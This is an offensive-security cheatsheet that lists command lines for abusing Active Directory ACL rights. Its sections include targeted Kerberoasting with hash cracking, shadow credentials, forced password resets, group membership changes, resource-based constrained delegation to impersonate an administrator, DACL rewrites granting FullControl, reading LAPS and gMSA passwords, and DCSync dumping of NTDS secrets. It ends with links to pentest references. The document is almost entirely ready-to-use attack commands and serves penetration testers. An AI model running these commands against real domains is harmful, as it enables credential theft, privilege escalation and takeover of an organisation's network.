AD ACLs Cheatsheet

AD ACLs Cheatsheet

GenericWrite on User

Targeted Kerberoasting

targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force john <hash_file> --wordlist=rockyou.txt

ShadowCredentials

certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip

Using Kerberos

certipy shadow auto -username username@domain -k -account target_user -dc-ip ip

GenericALL

Change Password

bloodyAD --host dc -d domain -u username -p password set password target new_password net rpc password 'username' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash net rpc password 'username' 'new_password' -U 'domain'/'username'%'password' -S 'dc'

Add user to a group

net rpc group addmem target_group username -U domain/username -S dc bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username

RBCD

impacket-rbcd -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password' impacket-getST -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password export KRB5CCNAME=administrator.ccache

GenericALL on OU

impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password

ForceChangePassword

net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController> bloodyAD --host ip -d dc -u username -p password set password target_userename new_password python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password> nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'

AddMember

net rpc group addmem target_group username -U domain/username -S dc bloodyAD --host dc -d domain -u username -p password add groupMember target_group user_to_add

AddSelf

bloodyAD --host dc -d domain -u username -p password add groupMember target_group username

WriteOwner

impacket-owneredit -action write -new-owner username -target target domain/username:password impacket-dacledit -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'

or

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password' bloodyAD --host dc -d domain -u username -p password add groupMember target_group username

WriteSPN

bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow' impacket-GetUserSPNs domain/username:password -dc-ip ip -request

or

targetedKerberoast -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user

AddKeyCredentialLink

pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip getnthash.py domain/target -k key -dc-ip ip

or

certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip

ReadLAPSPassword

nxc smb target -u username -p password --laps

ReadGMSAPassword

nxc ldap target -u username -p password --gmsa

DCSync

impacket-secretsdump domain/username:password@domain impacket-secretsdump domain/username@domain -hashes :hash impacket-secretsdump dc -k nxc smb target -u username -p password --ntds nxc smb target --use-kcache --ntds

Resources

• https://www.thehacker.recipes/ad/movement/dacl/
• https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
• https://mayfly277.github.io/posts/GOADv2-pwning-part11/
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces